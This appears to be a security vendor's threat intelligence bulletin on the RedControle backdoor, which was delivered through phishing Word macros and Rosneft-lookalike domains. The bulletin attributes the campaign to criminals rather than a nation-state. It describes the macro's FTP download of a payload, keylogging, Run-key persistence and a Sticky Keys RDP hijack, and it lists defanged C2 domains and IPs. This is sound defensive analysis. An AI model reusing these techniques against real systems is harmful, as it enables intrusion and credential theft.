Nation-state conflict has come to dominate many of the policy discussions and much of the strategic thinking about cybersecurity. When events of geopolitical significance hit the papers, researchers look for parallel signs of sub rosa cyber activity carried out by state-sponsored threat actors—espionage, sabotage, coercion, information operations—to complete the picture. After all, behind every story may lurk a cyber campaign.
But ordinary criminals read the newspaper too and are keenly aware of the bias some researchers bring to the table. Exploiting that bias can provide additional camouflage, another layer of seeming invisibility, making threat actors harder to detect.
In this Threat Intelligence Bulletin, we’ll show how an investigation into the apparent targeting of a state-owned Russian oil company led to the uncovering not of a state-sponsored campaign but of the bold activity of what we believe to be a criminal effort motivated by the oldest of incentives—money.
Rosneft calls itself the world’s largest publicly traded oil company, and, according to recent analysis in the New York Times, it is also a prominent foreign policy tool of the Russian government. More than half of the company is owned by Moscow and serves as a major pillar of critical infrastructure for Russia as well as other neighboring nation states.
So when a deal reportedly worth an excess of $10 billion was announced to take nearly 20% of the company private, news organizations around the world took note.
The deal quickly became the subject of international political intrigue: Who were the buyers? Why was it sold? Who brokered the deal? Facts that became even more apparent when the transaction received conspicuous mention in the now-infamous Steele Dossier.
Reporters, business leaders, and international observers also focused scrutiny on Rosneft in part because the deal was, according to news reports, fraught with delays and setbacks and came to involve a cast of characters that reportedly included a former Qatari diplomat turned head of a sovereign wealth fund.
Everything we learned about Rosneft in the last few years—its status as critical infrastructure, the huge sums of money involved in its privatization, its domestic and international political significance—made it a highly likely and legitimate target of foreign espionage efforts.
Indeed, when we at Cylance first saw the name “Rosneft” emerge in our research, we thought that was exactly what we were looking at: another state or state-sponsored espionage effort.
But we soon discovered that our initial impressions were flawed.
In July 2017, Cylance stumbled upon some interesting macros embedded in Word documents we uncovered in a common malware repository that seemed to be aimed at Russian-speaking users. We observed the same type of document resurface in the beginning of 2018 and decided to take a closer look.
Upon closer inspection, we noticed that the malware author meticulously used command and control (C2) domains which very closely mimicked their real counterparts in the Russian oil and gas industries, in particular Rosneft and subsidiaries of Rosneft.
As we investigated further, we discovered that the threat actor had created similar sites to mimic more than two dozen mostly state-owned oil, gas, chemical, agricultural, and other critical infrastructure organizations, in addition to major Russian financial exchanges.
The first Rosneft-related site we came across was “rnp-rosneft[.]ru” which was designed to resemble the legitimate webpage “mp-rosneft[.]ru”. The only reference to this domain we could identify was the email address “sec_hotline@mp-rosneft[.]ru” which was used by Rosneft for confidentially reporting corporate fraud, corruption, and embezzlement.
After a bit of malware excavation, we discovered that the author had been operating for more than three years with very few changes to the actual malware used other than his/her targets. Interestingly, we uncovered evidence that suggests the actor started out targeting the gaming community, specifically users of Steam, then quickly evolved to more lucrative endeavors.
Cylance researchers identified several phishing documents which used Microsoft Office macros to deliver malicious implants to their targets. It’s not entirely clear whether these were specifically targeted at isolated groups or utilized the old spray-and-pray method to cast a much wider net. Let’s take a look at one:
Filename: На ознакомление.doc ~ For Review.doc
Figure 1: Macro Contents of Phishing Document
At a high level, this macro will write a number of FTP commands to a text file named “1.txt” in %APPDATA%. When executed by the last command it will login and download a file from an ftp server hosted on “rnp-rosneft[.]ru” and save it as “module.exe”. It then starts the “module.exe” binary and deletes another file named “1.cmd”. The binary “module.exe” was a modern variant of a family of malware that ESET calls “RedControle.” Cylance identified several other phishing documents which operated in a similar vein that are listed in the Appendix.
We were able to recover several recent samples associated with phishing attempts connected to the rnp-rosfnet[.]ru domain as well as some older samples tied to trstorg[.]ru from July 2017. From what we could gather, “tstorg[.]ru” was originally the website of a Russian company called “TechnoSnabTorg” involved in the sale of spare parts for drilling and road-building equipment; the company specialized in providing parts for Caterpillar, Komatsu, Volvo, Fiat, and Hitachi equipment.
This sample was first submitted to online virus scanners in July 2017 and detected by only 13 companies at that time:
SHA256 of 2017 RedControle Sample:
Актуальный ПРАЙС10.07.2017.exe, ApMsgFwd.exe, SetLogin1Connect.exe
The backdoor was programmed in Delphi and communicates over HTTP to two C2 servers. It sends information about the IP address, hostname, and attached drives in its initial communications.
It first attempts to communicate directly to the IP address “91.211.245[.]246” on TCP port 80 and then will attempt to communicate to “83.166.242[.]15” on TCP port 17425. Keystroke data, clipboard data, as well as window names are communicated in clear text via HTTP to the 91.211.245[.]246 in near-real time as the victim interacts with their computer.
The information is collected using a well-known method leveraging the SetWindowsHookExA API. Commands are received from the other C2 server “83.166.245[.]15” in what appears to be cleartext; however, the backdoor also has the ability to communicate over SSL using the Delphi Indy library:
Figure 2: Example TCP HTTP Requests Sending Keystroke and Window Data
The backdoor installs itself using the good old-fashioned Run key under the infected user’s registry hive
The backdoor had the ability to upload and download files, manipulate files and folders, compress and decompress files using ZLIB, enumerate drive information and host information, elevate privileges, capture screenshots and webcam pictures, block and/or simulate user input, log keystrokes, and manipulate processes on the infected system.
Directives from the C2 were randomly broken up by the character “_” in an attempt to likely evade HIDS and NIDS signatures such as the command “ST_A_RT_FI_LE”.
Later versions of RedControle used randomized strings broken up by the same “_” character to further hinder signature-based analysis and reverse engineering efforts. In the sample Cylance researchers analyzed, the initial connection looked something like this:
Where the string in BLUE was sent by the C2 server and the string in RED was sent by the victim as an initial check in containing the IP address and a unique victim identifier. The backdoor operated using a series of threads which were designed to segment different backdoor functionality into autonomous threads which ran based on different pre-defined Delphi-based timers.
The backdoor appeared to be a mishmash of different authorship with the keylogger portion containing Portuguese language strings and other functions related to process manipulation containing references to Slavic language strings. These strings were eventually removed or obfuscated in later versions.
Cylance identified an executable dropper:
The dropper planted a version of RedControle on the system as well as another interesting binary while showing the potential victim a nice picture of a holiday present. The dropper was relatively uninteresting; however, a Sticky Keys backdoor would also be placed on the system, which warranted additional analysis.
Dropper SHA256 Hash:
Associated RedControle SHA256:
Associated StickyKeys SHA256:
The dropper created two executable files within the folder “%ALLUSERSPROFILE%\Documents”, “svhost.exe” and “system.exe” and created two associated Run keys to maintain persistence for both executables. The program “svhost.exe” was the aforementioned RedControle variant with network callbacks to the domain “trstorg[.]ru” and the IP address “83.166.243[.]48”.
The “system.exe” file was a StickyKeys backdoor programmed in Delphi. It first opened TCP port 3389 in the Windows Firewall and then set the following Registry Keys:
The file was primarily responsible for enabling RDP on the target system and performing a sticky keys hijack to point to the legitimate “taskmgr.exe” binary.
If our readers are unfamiliar with StickyKeys, it was originally designed for people who have difficulty holding down two or more keys simultaneously. StickyKeys can be enabled on Windows by rapidly pressing the shift key five times. The registry key above will simultaneously launch the Task Manager binary “taskmgr.exe” along with the intended StickyKeys binary. The StickyKeys backdoor can then test corresponded to “google.ru” and various subdomains. If the test is successful, it will make the following HTTP request to “trstorg[.]ru” on TCP port 80:
Figure 3: Example Request and Server Response from StickyKeys Backdoor
This particular sample will no longer work as the IP address “80.254.96[.]251” appeared to have been reassigned to another party and no longer operates a webserver.
The RedControle backdoors frequently created the unique mutex
which directly links the above samples to the following hashes through open source intelligence:
Several of these samples communicated to the domains “sxe-csgo[.]net” and “h84622.s05.test-hf[.]su”.
These domains led to two primary IP addresses: “91.227.16[.]115” and “91.227.16[.]6” as well as a few hundred unique file hashes.
The IP addresses “109.68.190[.]244” and “46.38.50[.]106” which resolved to “sxe-csgo[.]net” in 2015 and 2016 let Cylance definitively tie this subset of activity to activity targeting the Russian Steam community as well as the Counterstrike and CS:Go communities previously documented here, here, and here.
The threat actor left bits of infrastructure open over time and Cylance was able to harvest some of the server-side scripts utilized by the malware for tracking and recording data stolen from intended victims. Additionally, the attacker utilized Cloudflare for free bulk SSL certificates, which inadvertently exposed a number of domains.
The attacker put a lot of time and effort into closely imitating legitimate domains and continually altered their targets over time. They would also occasionally register legitimate domains after the domains had expired.
The actor relied heavily upon the Lithuanian provider “vpsnet[.]lt” likely as a result of the low cost overhead of a couple euros per month per virtual private server (VPS).
When we first discovered that the threat actor was using more than two dozen websites to mimic real Russian critical infrastructure companies, we were intrigued. The effort required to set up those domains seemed disproportionate to the perceived benefit of using them simply as command-and-control infrastructure.
Then we saw a paid contributor article in a Russian edition of Forbes, published in April 2017 and entitled (in Google’s translation to English) Attack of the Clones: How Schemes Work with Fake Sites of Rosneft and Other Large Companies.
The author was Ilya Sachkov, the founder and CEO of infosec company Group-IB and a member of cybercrime expert committees in the Council of Europe and the OSCE.
The article described what appeared to be unpublished Group-IB research findings into an elaborate criminal scheme wherein a threat actor was creating near-clones of legitimate Russian critical infrastructure companies—Rosneft most prominent among them—in order to harvest credentials and perpetuate fraud.
In the article, Sachkov provided screen shots of many of the mimicked sites to establish just how painstakingly close to the original these fake sites were designed to look.
The article referenced several of the companies and websites by name, which Group-IB said were part of the fraud campaign. At least one of the affected companies was described in the article as being a client of Group-IB.
That company’s domain, as well as nearly all of the other domains cited by Group-IB were also uncovered in the Cylance investigation. For example, in addition to Rosneft, they included: Mendeleevkazot, HCSDS, and EuroChem. Mendeleevkazot is a fertilizer manufacturer and part of a larger Russian critical infrastructure holding company. HCSDS is an acronym for a Siberian Business Union, a holding company comprised of several Russian critical infrastructure companies. EuroChem (Group-IB’s apparent client) is a Swiss-based fertilizer company with its primary mining activity in Russia. Its name came up in several news-related searches indicating its involvement in large financial transactions as well as geopolitical maneuvering.
Given the overlap in findings and the direct connection to past criminal campaigns targeting the gaming community, it seemed clear we were looking at the same operation—a criminal operation, not nation-state espionage activity.
The line between well-organized criminal efforts and nation-state activity can often be blurry, but practitioners and consumers of threat intelligence should beware of inherent biases. As we have shown in this Bulletin, what appears at first blush to be a clear indicator of nation-state malfeasance may in fact simply allow a criminal to hack your way of thinking shortly before hacking your organization.
Phishing Documents Hashes:
C2 and Phishing Domains: